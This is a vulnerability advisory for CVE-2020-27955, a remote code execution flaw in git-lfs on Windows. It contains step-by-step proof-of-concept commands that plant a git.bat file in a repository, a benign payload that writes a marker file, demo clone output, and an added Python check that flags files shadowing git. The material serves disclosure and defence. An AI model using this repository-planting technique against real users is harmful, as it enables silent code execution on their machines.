=============================================
- Discovered by: Dawid Golunski (@dawid_golunski)
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://exploitbox.io

- CVE-2020-27955
- Release date: 04.11.2020
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

Git <= 2.29.2 - Remote Code Execution (RCE) via git-lfs


II. BACKGROUND
-------------------------


Git

"Git is a free and open source distributed version control system designed to 
handle everything from small to very large projects with speed and efficiency."

https://git-scm.com/


--


Git LFS

"An open source Git extension for versioning large files

Git Large File Storage (LFS) replaces large files such as audio samples, 
videos, datasets, and graphics with text pointers inside Git, while 
storing the file contents on a remote server like GitHub.com or GitHub 
Enterprise."

https://git-lfs.github.com/



III. INTRODUCTION
-------------------------


Git in versions <= 2.29.2 bundles the git-lfs extension, which allows remote 
attackers to execute arbitrary code on the victim's Windows system upon a
clone operation.



IV. DESCRIPTION 
-------------------------


Due to the vulnerability in git-lfs described at:


Git-LFS <= 2.12 RCE Exploit



Attackers may be able to plant a backdoor in the root directory of a malicious 
repository by simply adding an executable file named: 

- git.bat
- git.exe
- git.cmd 
- git.vbs

or any other executable extension available on the target Windows system 
(PATHEXT environment variable dependent).

As a result, when git-lfs invokes git, the planted file is executed automatically
instead of the genuine git binary located in a trusted path.
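The following audit check, added here and not part of the original advisory or of
the git-lfs project, flags repository root entries that would shadow the "git"
command under the PATHEXT rule described above. It works on a path list such as
the output of `git ls-tree -r --name-only HEAD` (so it can run server-side on
Linux before a Windows client ever clones) or on a checked-out directory; the
DEFAULT_PATHEXT value is an assumed stock Windows default used when the
environment variable is absent.

```python
"""Audit a repository for files that could shadow the 'git' command on Windows.

Scenario from the advisory: a file such as git.bat in the repository root is
resolved instead of the real git binary. This check flags any top-level file
whose name is 'git' plus an extension listed in PATHEXT, comparing names
case-insensitively as Windows does.
"""
import os
from typing import Iterable, List, Optional

# Assumed stock Windows PATHEXT default, used when the variable is not set
# (for example when this check runs on a Linux hosting server).
DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"


def parse_pathext(pathext: Optional[str] = None) -> List[str]:
    """Split a ';'-separated PATHEXT string into lower-case extensions."""
    raw = pathext if pathext is not None else os.environ.get("PATHEXT", DEFAULT_PATHEXT)
    return [ext.strip().lower() for ext in raw.split(";") if ext.strip()]


def shadowing_candidates(paths: Iterable[str], pathext: Optional[str] = None,
                         command: str = "git") -> List[str]:
    """Return the paths that Windows command lookup would accept as `command`.

    Only entries directly in the repository root count, because that is the
    working directory the advisory describes. Paths use the '/' separator
    emitted by `git ls-tree`.
    """
    exts = set(parse_pathext(pathext))
    hits = []
    for path in paths:
        if "/" in path.strip("/"):
            continue  # nested entry, not in the repository root
        stem, ext = os.path.splitext(path)
        if stem.lower() == command.lower() and ext.lower() in exts:
            hits.append(path)
    return sorted(hits)


def scan_checkout(root: str, pathext: Optional[str] = None) -> List[str]:
    """Apply the same check to the top-level files of a cloned directory."""
    entries = [n for n in os.listdir(root) if os.path.isfile(os.path.join(root, n))]
    return shadowing_candidates(entries, pathext)


if __name__ == "__main__":
    # Constructed sample listing modelled on the PoC repository layout.
    sample = ["git.bat", ".gitattributes", "big-bug-lfs-file.dat",
              "docs/git.exe", "GIT.CMD", "git.txt"]
    for hit in shadowing_candidates(sample, DEFAULT_PATHEXT):
        print(f"WARNING: {hit} would shadow 'git' on a Windows checkout")
```

Wire `shadowing_candidates` into a pre-receive hook or a CI step and reject pushes that return a non-empty list; `scan_checkout` serves the same purpose on an already cloned tree.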



V. PROOF OF CONCEPT
-------------------------


A git-lfs PoC exploit for git may be prepared with the following steps:



Attacker:

On a separate Linux system (so that the executable is not run on the local host on commit):


1. Create a new repository:

    mkdir git-lfs-RCE-exploit
    cd git-lfs-RCE-exploit
    git init


2. Prepare a malicious executable, e.g. git.bat with the following contents:

    @echo hacked > GITHACKED


3. Add the executable to the repository:

    git add git.bat


4. Add LFS file entries to the repository. This is necessary to trigger 
the vulnerable git-lfs extension when the repository is cloned and processed
by the main git process.

    git lfs track "*.dat"
    git add .gitattributes

    echo "git exploit PoC" > big-bug-lfs-file.dat
    git add big-bug-lfs-file.dat


5. Commit both the exploit and the lfs files:

    git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
    

6. Push the changes to the repository:

    git remote add origin https://github.com/some-user-name/lfspoc
    git push -u origin master



Victim:

On Windows, open a powershell.exe shell and clone the PoC repo:

    git clone https://github.com/some-user-name/lfspoc .

At this point the malicious executable (git.bat) is downloaded into the repo's 
directory and automatically executed by the git-lfs extension, without any user
interaction. 


As a result, a 'GITHACKED' file should appear in the repo's directory. 
To check, type:

    dir 




Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:

C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .

Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...

C:\Users\victim> type GITHACKED
hacked


VI. BUSINESS IMPACT
-------------------------

The vulnerability can lead to a full compromise of the victim's system as
attackers can execute arbitrary commands remotely without the knowledge of the
victim. 

Given the critical severity, affected users and product vendors should update 
to the latest git-lfs version as soon as possible, as the vulnerability is
trivial to exploit.

 
VII. SYSTEMS AFFECTED
-------------------------

Git <= 2.29.2 on Windows systems (Windows Server 2019, Windows 10 Pro, etc.)
with a default installation of the Git Windows package, which has the git-lfs
extension in versions <= 2.12 installed.


VIII. SOLUTION
-------------------------

This Remote Code Execution vulnerability was reported to the git-lfs vendor, who 
issued a patched release on the official website linked below. 

Alternatively, the latest git release which contains the patched version of 
git-lfs may be installed instead.

 
IX. REFERENCES
-------------------------

https://git-lfs.github.com/

https://git-scm.com/

https://github.com/git-lfs/git-lfs


git-lfs vuln advisory (CVE-2020-27955)

Git RCE Exploit PoC (CVE-2020-27955)


PoC repository with Bat/powershell exploit:
Git-lfs RCE exploit PoC repository (Bat/powershell)

PoC repository with Go version of the exploit (git.exe):
Git-lfs RCE exploit PoC repository (Go)

https://legalhackers.com

https://ExploitBox.io



Demos for other clients can also be viewed at:

Git LFS RCE

Visual Studio Code / VS Git-LFS RCE Exploit CVE-2020-27955

GitKraken Git-LFS RCE Exploit CVE-2020-27955

SmartGit Git-LFS RCE Exploit CVE-2020-27955

GitHub Desktop Git-LFS RCE Exploit CVE-2020-27955




X. CREDITS
-------------------------

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://twitter.com/dawid_golunski

https://ExploitBox.io
https://twitter.com/Exploit_Box

XI. REVISION HISTORY
-------------------------

04.11.2020 - Advisory released, rev. 1
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.